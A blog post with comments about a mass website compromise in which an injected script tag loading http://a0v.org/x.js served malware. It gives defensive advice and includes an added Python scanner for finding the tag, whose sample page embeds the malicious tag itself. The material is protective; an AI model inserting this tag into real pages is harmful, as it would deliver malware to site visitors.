55,000 Web sites hacked to serve up malware cocktail | Zero Day | ZDNet.com

ZDNet is reporting that ScanSafe has found around 55,000 websites that are compromised with malware today.  As of right now, a Google search for “script src=http://a0v.org/x.js” (the I-Frame tag used in the infection; if this link is clickable, DO NOT CLICK IT) returns 107,000 hits.  Some of those are not malicious, but are reports about the compromise.

What does this mean?  It means that if you’re a webmaster you need to search your site for this tag.  If your site is listed, you need to scrub your site and reinforce your security measures.  If you’re a web surfer, you need to be careful about where you go.
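As an added example (not part of the original post), here is a small scanner a webmaster could run over a local copy of the site to find the injected tag. It matches the quoting, spacing and case variants that a plain text search for the exact string would miss, and reports the surrounding line so a tag dropped into the middle of legitimate markup is visible; the function names, the sample page and the file suffix list are my own assumptions.

```python
import re
from pathlib import Path
from typing import NamedTuple

# Marker from the post: the injected tag loads http://a0v.org/x.js.
# The regex tolerates no quotes, single quotes, extra whitespace and mixed case,
# all of which defeat a literal search for the string quoted in the post.
INJECTED_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?\s*https?://a0v\.org/x\.js",
    re.IGNORECASE,
)


class Hit(NamedTuple):
    source: str   # file path or other label for where the text came from
    line: int     # 1-based line number within the text
    snippet: str  # the offending line, trimmed, so the surrounding HTML is visible


def scan_text(text: str, source: str) -> list[Hit]:
    """Return one Hit per line of `text` that carries the injected script tag."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if INJECTED_SRC.search(line):
            hits.append(Hit(source, number, line.strip()[:120]))
    return hits


def scan_tree(root: Path, suffixes=(".html", ".htm", ".asp", ".aspx")) -> list[Hit]:
    """Walk a web root on local disk and scan every page-like file (assumed suffix list)."""
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits.extend(scan_text(text, str(path)))
    return hits


# Constructed sample: a contact page that is clean except for one unquoted tag
# sitting in the middle of an otherwise legitimate line of markup.
SAMPLE_PAGE = """<html><body>
<h1>Contact Us</h1>
<form action="/contact.aspx" method="post"><script src=http://a0v.org/x.js></script><input type="submit" value="Send">
</form>
<script src="/js/site.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_PAGE, "contact.aspx (constructed sample)"):
        print(f"{hit.source}:{hit.line}: {hit.snippet}")
```

To check a whole site, call `scan_tree(Path("/path/to/webroot"))`; content that is assembled from a database at request time must be exported and fed to `scan_text` instead, since the marker will not be present in the page files on disk.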

55,000 or even 107,000 doesn’t sound like a lot of sites in the big picture.  But, if you’re looking for sporting heroes, charities, cruises, information about studying in China, or assisted living facilities (just to name a few types of sites that are compromised) you need to worry.

It appears that at least some of the sites are compromised on their “Contact Us” pages.  So, without actually visiting the sites, I can only guess that the I-Frame is hiding on top of the Submit button on the contact form.  This is a form of “Click-jacking”.

My suggestion is that you use a browser such as Firefox with “No-Script” or other add-ons that block JavaScript and Flash for a while.  With 107,000 sites, it’s going to be a long time before this mess is cleaned up.  And since the number of infected sites is growing, not shrinking, we’re in the early stages of the curve.

If you have to use Internet Explorer, then I suggest turning on Protected Mode and paying close attention to what’s going on.  If you’re looking at a site and it wants to download something, click “No”. If the site doesn’t work properly, you can always refresh and click “Yes”.  I don’t recommend clicking the “Allow on all Websites” option, as this effectively defeats the purpose of Protected Mode.

And you need to make sure your antivirus and antispyware programs are updated and doing their jobs too.  While this malware may be new enough that it’s not detected immediately, the antimalware community will catch up to it.

Tread carefully for a while.  More so than you should be already.

Have a great day:)
Patrick.



3 thoughts on “55,000 Web sites hacked to serve up malware cocktail | Zero Day | ZDNet.com”

  • WeWatch

    It appears from reviewing thousands of these sites, that most of them are using .asp or .aspx pages which are generally dynamically generated.

    This leads us to believe that this is probably a SQL injection attack as the dynamically generated pages probably derive their content, or a portion of it, from a back-end database.

    Some of the iframes injected are right in the middle of legitimate lines of html code furthering our theory of the SQL injection.

    That’s just our opinion; we could be wrong.

  • PatsComputerServices

    I never thought about that (the SQL injection). My question then is how do you mitigate that? Would using No-Script still work and would using Protected Mode on IE work as well?

    Thanks for stopping by and commenting. I value the insight tremendously.

    Have a great day:)
    Patrick.

  • WeWatch

    Yes, both of those strategies would work for this type of attack from the visitor's point of view.

    The reason is that the injected code is still a script, and some of it that we've seen in this attack is highly obfuscated. With No-Script on, it stays obfuscated. The asp/aspx code is server side, so it will still render the html, but the script is client side, so it will not run if No-Script is on.

    It's nice that you're so proactive about this for your clients.

    Kudos to you.